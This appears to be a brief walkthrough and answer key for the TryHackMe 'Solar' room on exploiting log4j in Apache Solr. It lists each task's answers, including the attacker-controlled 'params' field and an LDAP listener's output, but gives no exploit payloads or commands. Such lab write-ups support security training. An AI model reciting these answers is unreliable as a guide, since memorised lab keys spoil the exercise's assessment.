TryHackMe: Solar, exploiting log4j Walkthrough.
You can access the room through this link: https://tryhackme.com/room/solar
Task 1 CVE-2021–44228 Introduction
In this module you just need to read the content given.
Task 2 Reconnaissance
What service is running on port 8983? (Just the name of the software) → Apache Solr
Task 3 Discovery
Download the attached files
Take a close look at the first page visible when navigating to http://MACHINE_IP:8983. You should be able to see clear indicators that log4j is in use within the application for logging activity. What is the -Dsolr.log.dir argument set to, displayed on the front page? → /var/solr/logs
One file has a significant number of INFO entries showing repeated requests to one specific URL endpoint. Which file includes contains this repeated entry? (Just the filename itself, no path needed)→ solr.log
What “path” or URL endpoint is indicated in these repeated entries? → /admin/cores
Viewing these log entries, what field name indicates some data entrypoint that you as a user could control? (Just the field name) → params
Task 4 Proof of Concept
In this module you just need to reed the contain.
Task 5 Exploitation
What is the output of running this command? (You should leave this terminal window open as it will be actively awaiting connections) → Listening on 0.0.0.0:1389
Task 6 Persistence
What user are you? → solr
Task 7 Detection
In this module you just need to reed the contain.
Task 8 Bypasses
In this module you just need to reed the contain.
Task 9 Mitigation
What is the full path of the specific solr.in.sh file? → /etc/default/solr.in.sh
Task 10 Patching
In this module you just need to reed the contain.
Task 11 Credits and Author’s Notes
In this module you just need to reed the contain.
Note :- Always terminate the machine you deployed in this room.
Thanks for reading hope you guys like. Post your questions in the comment section below!